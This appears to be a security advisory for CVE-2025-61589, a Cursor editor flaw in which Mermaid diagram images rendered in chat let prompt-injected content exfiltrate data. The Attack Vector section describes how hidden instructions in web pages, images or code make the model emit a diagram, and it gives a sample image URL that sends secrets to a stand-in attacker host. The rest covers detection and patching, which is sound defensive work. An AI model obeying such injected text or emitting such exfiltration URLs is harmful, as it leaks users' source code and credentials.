CVE-2025-61589 Overview
CVE-2025-61589 affects Cursor, an AI-powered code editor developed by Anysphere. The vulnerability exists in versions 1.6 and below, where the Mermaid diagram rendering feature allows embedded images to be fetched and rendered within the chat interface. An attacker who successfully performs a prompt injection can abuse this behavior to exfiltrate sensitive information to an attacker-controlled server through image fetch requests. The issue is classified under [CWE-200] Information Exposure. Anysphere fixed the vulnerability in Cursor version 1.7.
Critical Impact
Successful exploitation enables exfiltration of sensitive chat context, source code, or user data to third-party servers via covert image fetch requests triggered by prompt injection.
Affected Products
- Anysphere Cursor versions 1.6 and below
- Cursor chat interface with Mermaid diagram rendering enabled
- All platforms running vulnerable Cursor builds
Discovery Timeline
- 2025-10-03 - CVE-2025-61589 published to NVD
- 2026-06-17 - Last updated in NVD database
Technical Details for CVE-2025-61589
Vulnerability Analysis
Cursor integrates Mermaid, a JavaScript library used to render diagrams from text definitions, directly inside the chat box. Mermaid supports embedding images as part of diagram syntax. Cursor renders these images without restricting the destination host, which causes the client to issue outbound HTTP requests to arbitrary URLs. When an attacker controls the diagram content via prompt injection, they can construct an image URL that encodes sensitive context from the chat session into the request path or query string. The remote server receives this data through standard web access logs. A malicious model, hallucination, or backdoored fine-tune can also trigger the exploit without direct attacker interaction.
Root Cause
The root cause is missing egress restriction on rendered Mermaid content. Cursor treats model-generated diagram markup as safe for rendering and permits arbitrary external image URLs. No allowlist, content security policy, or same-origin restriction blocks outbound fetches. Additional bypasses of the initial patch were identified and tracked under GHSA-43wj-mwcc-x93p.
Attack Vector
Exploitation requires prompt injection delivered through untrusted content the model processes. Attack sources include malicious web pages fetched by the agent, uploaded images with embedded text, or source code files containing hidden instructions. The injected prompt instructs the model to emit a Mermaid diagram containing an image reference such as img: https://attacker.example/log?data=<secrets>. When Cursor renders the diagram, the client issues the fetch and delivers the embedded data to the attacker.
See the GitHub Security Advisory GHSA-xw2x-252g-97w2 and the follow-up GHSA-43wj-mwcc-x93p for technical details.
Detection Methods for CVE-2025-61589
Indicators of Compromise
- Outbound HTTP or HTTPS requests from Cursor processes to unfamiliar external domains during chat sessions
- Chat responses containing Mermaid diagrams with img: directives referencing external URLs
- Long query strings or path segments in outbound image fetches that appear to encode source code or credentials
Detection Strategies
- Inspect network telemetry from developer endpoints for image fetches initiated by the Cursor client to non-allowlisted hosts
- Review Cursor chat history for Mermaid blocks containing suspicious image references or base64-encoded parameters
- Correlate prompt injection sources such as scraped web content or uploaded files with subsequent unusual egress
Monitoring Recommendations
- Monitor DNS queries from developer workstations for newly registered or low-reputation domains contacted by Cursor
- Log and alert on Cursor process network activity exceeding baseline volumes during agentic sessions
- Track Cursor version deployment across the fleet to identify hosts still running versions at or below 1.6
How to Mitigate CVE-2025-61589
Immediate Actions Required
- Upgrade Cursor to version 1.7 or later on all developer endpoints
- Audit recent chat sessions and agent runs for evidence of Mermaid-based exfiltration attempts
- Restrict Cursor egress at the network layer to trusted model and update endpoints where feasible
Patch Information
Anysphere released a fix in Cursor version 1.7 as documented in GHSA-xw2x-252g-97w2. Additional bypasses discovered after the initial fix are addressed in the guidance under GHSA-43wj-mwcc-x93p. Confirm the installed version reports 1.7 or higher before treating the issue as remediated.
Workarounds
- Disable or avoid rendering Mermaid diagrams in chat until the patched version is deployed
- Limit exposure of untrusted content such as scraped web pages, third-party source code, or uploaded images to the assistant
- Apply outbound network egress rules on developer machines to block image fetches to non-allowlisted domains
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

